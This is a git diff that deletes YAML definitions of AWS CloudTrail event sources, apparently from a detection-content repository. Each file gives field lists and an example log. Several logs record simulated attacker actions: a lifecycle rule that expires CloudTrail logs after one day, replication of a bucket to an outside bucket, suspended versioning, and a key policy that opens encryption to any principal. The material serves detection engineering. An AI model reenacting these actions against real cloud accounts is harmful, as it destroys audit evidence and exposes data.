-event_name: AWS CloudTrail PutBucketLifecycle
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.LifecycleConfiguration.Rule.Expiration.Days
-- requestParameters.LifecycleConfiguration.Rule.Filter.Prefix
-- requestParameters.LifecycleConfiguration.Rule.ID
-- requestParameters.LifecycleConfiguration.Rule.Status
-- requestParameters.LifecycleConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.lifecycle
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"}, "eventTime": "2022-07-13T21:58:27Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketLifecycle", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57", "userAgent": "[stratus-red-team_d73089cf-1905-430c-b6d3-4dc4d669190f]", "requestParameters": {"lifecycle": "", "bucketName": "my-cloudtrail-bucket-alfsujjpnbpguqrh", "LifecycleConfiguration": {"xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled", "Filter": {"Prefix": "*"}, "Expiration": {"Days": 1}, "ID": "nuke-cloudtrail-logs-after-1-day"}}, "Host": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 249, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "TVXZE5kOVTMLqYlmKK+j/5g6flwkiFXFfw8PyNivFO4/9YXnDsyzFlGEzAy2rukTTiukLdEwtuM=", "bytesTransferredOut": 0}, "requestID": "1P8X27T2BCMY93Y9", "eventID": "25d92cd1-f366-4b11-b408-967a17ce70f3", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::my-cloudtrail-bucket-alfsujjpnbpguqrh"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
deleted file mode 100644
index 2f588d4e7d..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
+++ /dev/null
@@ -1,104 +0,0 @@
-event_name: AWS CloudTrail PutBucketReplication
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.ReplicationConfiguration.Role
-- requestParameters.ReplicationConfiguration.Rule.DeleteMarkerReplication.Status
-- requestParameters.ReplicationConfiguration.Rule.Destination.Bucket
-- requestParameters.ReplicationConfiguration.Rule.Filter
-- requestParameters.ReplicationConfiguration.Rule.ID
-- requestParameters.ReplicationConfiguration.Rule.Priority
-- requestParameters.ReplicationConfiguration.Rule.Status
-- requestParameters.ReplicationConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.replication
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-- vpcEndpointId
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4H11:bpatel@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bpatel@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLJOVYQHW2", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4H11", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-04-24T23:45:42Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-04-24T23:49:33Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketReplication", "awsRegion": "us-west-2", "sourceIPAddress": "23.93.193.6", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030 Linux/5.4.238-155.347.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.362-b10 java/1.8.0_362 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"replication": "", "bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "ReplicationConfiguration": {"Role": "arn:aws:iam::111111111111:role/attack_range_bpatel", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled", "Destination": {"Bucket": "arn:aws:s3:::badpublicbuckettest"}, "Filter": "", "Priority": 0, "ID": "replication_x_test", "DeleteMarkerReplication": {"Status": "Disabled"}}}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 416, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "8UoliFe/sG2/v8qB2g763/g0Fy+kfaUqtKrzLHEILnHUisC3rL1dQfJ3NSIYcA/kzpIHQ955pGo=", "bytesTransferredOut": 0}, "requestID": "14SAVMJNEJMTZN91", "eventID": 
"fbe079d1-bc6b-4ee0-8893-d2b412c5550f", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
deleted file mode 100644
index b6c0992a40..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: AWS CloudTrail PutBucketVersioning
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.VersioningConfiguration.Status
-- requestParameters.VersioningConfiguration.xmlns
-- requestParameters.bucketName
-- requestParameters.versioning
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-- vpcEndpointId
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:daftpunk@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/daftpunk@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAQ5VXXXX", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-04T15:18:37Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-04T15:19:25Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketVersioning", "awsRegion": "us-west-2", "sourceIPAddress": "73.57.168.38", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030 Linux/5.4.196-119.356.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08 java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "versioning": "", "VersioningConfiguration": {"Status": "Suspended", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/"}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 125, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "F3tJSu/C2DMkRNLldcWTRzApxQa6v197ImcuQDA++vaeaLj9UvcIkEFgDIrMYUdXLI4t+Uih5hk=", "bytesTransferredOut": 0}, "requestID": "5KXZDSNDYXWC8Q4M", "eventID": "42d7a97e-9d35-4c8e-8d0a-4a82d91aab55", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": 
"111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
deleted file mode 100644
index e6ee58d2dc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: AWS CloudTrail PutImage
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.imageManifest
-- requestParameters.imageManifestMediaType
-- requestParameters.imageTag
-- requestParameters.registryId
-- requestParameters.repositoryName
-- resources{}.ARN
-- resources{}.accountId
-- responseElements.image.imageId.imageDigest
-- responseElements.image.imageId.imageTag
-- responseElements.image.imageManifest
-- responseElements.image.imageManifestMediaType
-- responseElements.image.registryId
-- responseElements.image.repositoryName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.invokedBy
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AAAAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/test", "accountId": "111111111111", "accessKeyId": "AAAAAAAAAAAAAAAAAAAAA", "userName": "test", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-18T23:15:39Z", "mfaAuthenticated": "false"}}, "invokedBy": "AWS Internal"}, "eventTime": "2021-08-18T23:17:30Z", "eventSource": "ecr.amazonaws.com", "eventName": "PutImage", "awsRegion": "eu-central-1", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"registryId": "111111111112", "repositoryName": "devsecops/cat_dog_server", "imageManifest": "{\n \"schemaVersion\": 2,\n \"mediaType\": \"application/vnd.docker.distribution.manifest.v2+json\",\n \"config\": {\n \"mediaType\": \"application/vnd.docker.container.image.v1+json\",\n \"size\": 6591,\n \"digest\": \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n },\n \"layers\": [\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2811969,\n \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 35426616,\n \"digest\": \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2347076,\n \"digest\": \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 280,\n \"digest\": \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 92,\n \"digest\": 
\"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 373,\n \"digest\": \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2383293,\n \"digest\": \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 10001,\n \"digest\": \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n }\n ]\n}", "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json", "imageTag": "latest"}, "responseElements": {"image": {"registryId": "111111111112", "repositoryName": "devsecops/cat_dog_server", "imageId": {"imageDigest": "sha256:b7798f35949cc1a2d435c9ac59ab69e857fe635a359c96e4f56a8498ce02019c", "imageTag": "latest"}, "imageManifest": "{\n \"schemaVersion\": 2,\n \"mediaType\": \"application/vnd.docker.distribution.manifest.v2+json\",\n \"config\": {\n \"mediaType\": \"application/vnd.docker.container.image.v1+json\",\n \"size\": 6591,\n \"digest\": \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n },\n \"layers\": [\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2811969,\n \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 35426616,\n \"digest\": \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2347076,\n \"digest\": \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 
280,\n \"digest\": \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 92,\n \"digest\": \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 373,\n \"digest\": \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2383293,\n \"digest\": \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n },\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 10001,\n \"digest\": \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n }\n ]\n}", "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"}}, "requestID": "805a31e6-0fed-433b-b393-f463c6881334", "eventID": "1aef3588-ae84-4f1f-9276-8ec94ee6a7e9", "readOnly": false, "resources": [{"accountId": "111111111111", "ARN": "arn:aws:ecr:eu-central-1:1111111111111:repository/devsecops/cat_dog_server"}], "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
deleted file mode 100644
index b5eb989646..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail PutKeyPolicy
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.bypassPolicyLockoutSafetyCheck
-- requestParameters.keyId
-- requestParameters.policy
-- requestParameters.policyName
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T11:04:39Z", "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10 java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1", "policyName": "default", "policy": "{\n \"Version\": \"2012-10-17\",\n \"Id\": \"key-consolepolicy-3\",\n \"Statement\": [\n {\n \"Sid\": \"Enable IAM User Permissions\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:root\"\n },\n \"Action\": \"kms:*\",\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow access for Key Administrators\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\": [\n \"kms:Create*\",\n \"kms:Describe*\",\n \"kms:Enable*\",\n \"kms:List*\",\n \"kms:Put*\",\n \"kms:Update*\",\n \"kms:Revoke*\",\n \"kms:Disable*\",\n \"kms:Get*\",\n \"kms:Delete*\",\n \"kms:TagResource\",\n \"kms:UntagResource\",\n \"kms:ScheduleKeyDeletion\",\n \"kms:CancelKeyDeletion\"\n ],\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n 
\"Action\": [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\": \"*\"\n },\n {\n \"Sid\": \"Allow attachment of persistent resources\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\": [\n \"kms:CreateGrant\",\n \"kms:ListGrants\",\n \"kms:RevokeGrant\"\n ],\n \"Resource\": \"*\",\n \"Condition\": {\n \"Bool\": {\n \"kms:GrantIsForAWSResource\": \"true\"\n }\n }\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": \"*\"\n },\n \"Action\": [\n \"kms:Encrypt\"\n ],\n \"Resource\": \"*\"\n }\n ]\n}", "bypassPolicyLockoutSafetyCheck": false}, "responseElements": null, "requestID": "c7836c7a-ca95-47aa-a3fb-a7db0d66fec8", "eventID": "612f17e3-2317-4dd9-8aa3-393bc8a7961b", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
deleted file mode 100644
index f6aead0598..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
+++ /dev/null
@@ -1,92 +0,0 @@
-event_name: AWS CloudTrail ReplaceNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- protocol
-- protocol_code
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aclProtocol
-- requestParameters.cidrBlock
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleAction
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- rule_action
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
